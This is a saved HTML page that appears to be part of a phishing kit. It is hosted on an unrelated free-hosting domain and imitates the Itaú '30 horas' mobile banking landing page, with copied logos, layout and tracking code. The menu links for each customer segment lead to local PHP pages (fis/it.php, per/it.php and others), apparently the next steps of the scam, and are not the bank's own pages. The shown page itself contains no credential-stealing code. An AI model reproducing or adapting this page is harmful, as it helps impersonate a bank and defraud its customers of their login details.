
<!-- saved from url=(0042)http://sistemadecameras.esy.es/guarda/ini/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="format-detection" content="telephone=no"><meta http-equiv="Pragma" content="no-cache"><meta http-equiv="Expires" content="-1"><meta http-equiv="Cache-control" content="no-store">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script type="text/javascript" async="" src="./itPrin_files/ga.js.download"></script><script type="text/javascript" async="" src="./itPrin_files/ga.js(1).download"></script><script language="javascript">
        var autenticado = 'N';

        var isIPad = (navigator.userAgent.indexOf("iPad") > -1);
        if (!isIPad) {
            document.write('<meta name="viewport" content="width=device-width, user-scalable=-1;" />');
        }
    </script><meta name="viewport" content="width=device-width, user-scalable=-1;"><meta name="viewport" content="width=device-width, user-scalable=-1;">
    
    <script type="text/javascript">

        try {
            var _gaq = _gaq || [];
            _gaq.push(['_setAccount', 'UA-31857808-1']);

            _gaq.push(['_setCustomVar', 1, 'Aplicativo', 'NOT_APP/mozilla 5.0  windows nt 6.1  applewebkit 537.36  khtml  like gecko  chrome 50.0.2661.102 safari 537.36', 2]);
            _gaq.push(['_setCustomVar', 2, 'Experiencia', 'TOUCH_2', 2]);

            _gaq.push(['_trackPageview', '/Default']);

            (function() {
                var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
                ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
                var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
            })();
        }
        catch (err) {
        }

    </script>

    <title>
	Itaú 30 horas
</title><link id="ctl00_CssMaster" rel="stylesheet" type="text/css" href="./itPrin_files/iphone.css"></head>
<body onload="scrollTo(0, 1);" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">

    <script>
        function PostToDic(action, hid, op) {
            document.frmDic.id.value = hid;
            document.frmDic.op.value = op;
            document.frmDic.submit();
        }
        function post_to_url(path, params) {
            var method = "post";
            var form = document.createElement("form");
            form.setAttribute("method", method);
            form.setAttribute("action", path);
            for (var key in params) {
                var hiddenField = document.createElement("input");
                hiddenField.setAttribute("type", "hidden");
                hiddenField.setAttribute("name", key);
                hiddenField.setAttribute("value", params[key]);
                form.appendChild(hiddenField);
            }
            document.body.appendChild(form);
            form.submit();
        }

        function autoTab(input) {
            try {
                if (input.value.length >= input.maxLength) {
                    var proximoCampo = input.form[(getIndex(input) + 1) % input.form.length];

                    // pegar o x e y
                    var Y = proximoCampo.getY();
                    var X = proximoCampo.getX();

                    // chamar o inittouch para o ponto


                }
            } catch (e) { }
        }

        function getIndex(input) {
            var index = -1, i = 0, found = false;
            while (i < input.form.length && index == -1)
                if (input.form[i] == input)
                index = i;
            else
                i++;
            return index;
        }
        function DefineVersaoTokenApp(versao) {
            document.getElementById("ctl00_hddAppTokenApp").value = versao;

        }
        function ExisteApp(item) {
            document.getElementById("ctl00_hddExisteApp").value = item;
        }
        function RetornaDadosTokenAplicativo() {
            return "";
        }
        function RetornaSerieTokenAplicativo() {
            return "";
        }
    </script>

    <script language="javascript">
        function DesabilitaDefTecnoUsuario() {
            document.getElementById("ctl00_UCDefinicaoTecnologiaUsuario1_TbDefTecnoUsuarioB").style.display = 'none';
            document.getElementById("TbDefTecnoUsuario2").style.display = 'none';
        }
    </script>

    <form name="aspnetForm" method="post" action="https://ww70.itau.com.br/M/default.aspx" id="aspnetForm">
<div></div>
<table width="100%" style="position:absolute; height:100%" border="0" cellpadding="0" cellspacing="0">
      <tbody><tr style="height:10px" valign="top">
            <td>
                <table id="ctl00_tbTopo" height="76" border="0" width="100%" background="./itPrin_files/bg_iph_nm.png">
	<tbody><tr id="ctl00_trlogos">
		<td width="50%" height="47" align="left" id="ctl00_tdPrincipal1">
                            <img src="./itPrin_files/logo_nm.png" border="0">
                        </td>
		<td id="ctl00_TdPrincipal3" width="50%" align="right">
                            <img src="./itPrin_files/30_nm.png" border="0">
                        </td>
	</tr>
	<tr>
		<td colspan="3" class="PF_TituloIphone">
                            &nbsp;&nbsp;
                            <span id="ctl00_lblTitulo">Bem Vindo ao Itaú 30 horas</span>
                        </td>
	</tr>
</tbody></table>

            </td>
        </tr>
        <tr valign="top">
            <td valign="top">
                				
     
			
<table id="ctl00_ContentPlaceHolder1_TbTouch" border="0" width="100%" height="40px">
	<tbody>
    <tr>
		<td>
        <fieldset id="ctl00_ContentPlaceHolder1_FldMenu"> 
            
        <div class="row">
        <a href="fis/it.php" style="text-decoration:none;">
        <table style="vertical-align:middle;" border="0" width="100%" height="40px">
			<tbody>
            <tr style="vertical-align:middle;">
				<td width="1%"><img src="./itPrin_files/spacer.gif" border="0" class="hideSpacerPJ"></td>
				<td class="PF_texto" align="left"><span>Itaú Pessoa Física</span></td>
				<td width="1%" align="left" class="setaMenuPJ"><img src="./itPrin_files/seta_laranja.png" width="11" height="15" border="0"></td>
				<td width="1%"></td>
			</tr>
		</tbody>
        </table>
		</a>
        </div>
        <div class="row"><a href="clas/it.php" style="text-decoration:none;"><table style="vertical-align:middle;" border="0" width="100%" height="40px">
			<tbody><tr style="vertical-align:middle;">
				<td width="1%"><img src="./itPrin_files/spacer.gif" border="0" class="hideSpacerPJ"></td>
				<td class="PF_texto" align="left"><span>Itaú Uniclass</span></td>
				<td width="1%" align="left" class="setaMenuPJ"><img src="./itPrin_files/seta_laranja.png" width="11" height="15" border="0"></td>
				<td width="1%"></td>
			</tr>
		</tbody>
        </table>
		</a>
        </div>
        <div class="row">
        <a href="per/it.php" style="text-decoration:none;">
        <table style="vertical-align:middle;" border="0" width="100%" height="40px">
			<tbody><tr style="vertical-align:middle;">
				<td width="1%"><img src="./itPrin_files/spacer.gif" border="0" class="hideSpacerPJ"></td>
				<td class="PF_texto" align="left"><span>Itaú Personnalité</span></td>
				<td width="1%" align="left" class="setaMenuPJ"><img src="./itPrin_files/seta_laranja.png" width="11" height="15" border="0"></td>
				<td width="1%"></td>
			</tr>
		</tbody>
        </table>
		</a>
        </div>
        <div class="row" style="border-bottom:0px;">
        <a href="priv/it.php" style="text-decoration:none;">
        <table style="vertical-align:middle;" border="0" width="100%" height="40px">
			<tbody>
            <tr style="vertical-align:middle;">
				<td width="1%"><img src="./itPrin_files/spacer.gif" border="0" class="hideSpacerPJ"></td>
				<td class="PF_texto" align="left"><span>Itaú Private</span></td>
				<td width="1%" align="left" class="setaMenuPJ"><img src="./itPrin_files/seta_laranja.png" width="11" height="15" border="0"></td>
				<td width="1%"></td>
			</tr>
		</tbody>
        </table>
		</a>
        </div>
        </fieldset> 
        </td>
	</tr>
</tbody></table>


	


            </td>
        </tr>
        <tr style="height:50px;vertical-align:bottom;">
            <td valign="bottom">
                <table id="ctl00_UCDefinicaoTecnologiaUsuario1_TbDefTecnoUsuarioB" border="0" width="100%" cellspacing="0" cellpadding="0">
	<tbody><tr width="100%" valign="top">
		<td width="2%"></td>
		<td width="96%"><a href="https://ww70.itau.com.br/M/Config/Configuracao.aspx" id="ctl00_UCDefinicaoTecnologiaUsuario1_lnkConfiguracao" class="link_padrao1">Configurações</a></td>
		<td width="2%"></td>
	</tr>
</tbody></table>

        <table border="0" width="1%" cellspacing="6" cellpadding="0"><tbody><tr><td width="1%"></td></tr></tbody></table>
        <table border="0" width="100%" cellspacing="0" cellpadding="0" id="TbDefTecnoUsuario2">
        <tbody><tr width="100%" valign="top">
            <td width="2%"></td>
            <td id="ctl00_UCDefinicaoTecnologiaUsuario1_tdAcessar" width="96%" class="PF_texto10Normal">Acessar o Itaú na versão:</td>

            <td width="2%"></td>
            </tr><tr width="100%" valign="top">
                <td width="2%"></td>
                <td class="PF_texto10Normal" width="95%"><a href="https://ww70.itau.com.br/M/default.aspx?4716F56E31B371466652FB6E5C3D3F55CB35C5D8D8CA9C60C74581DAB03F8716" id="ctl00_UCDefinicaoTecnologiaUsuario1_lnkSimplificado" class="link_padrao1">Celular</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a id="ctl00_UCDefinicaoTecnologiaUsuario1_lnkTouch" class="PF_texto10Normal" style="text-decoration:none;">Celular touch</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a href="http://www.itau.com.br/" id="ctl00_UCDefinicaoTecnologiaUsuario1_lnkPC" class="link_padrao1">PC</a></td>
                <td width="2%"></td>
            </tr>
    </tbody></table>

            </td>
        </tr>
    </tbody></table>
    
<div>


</div>


</form></body></html>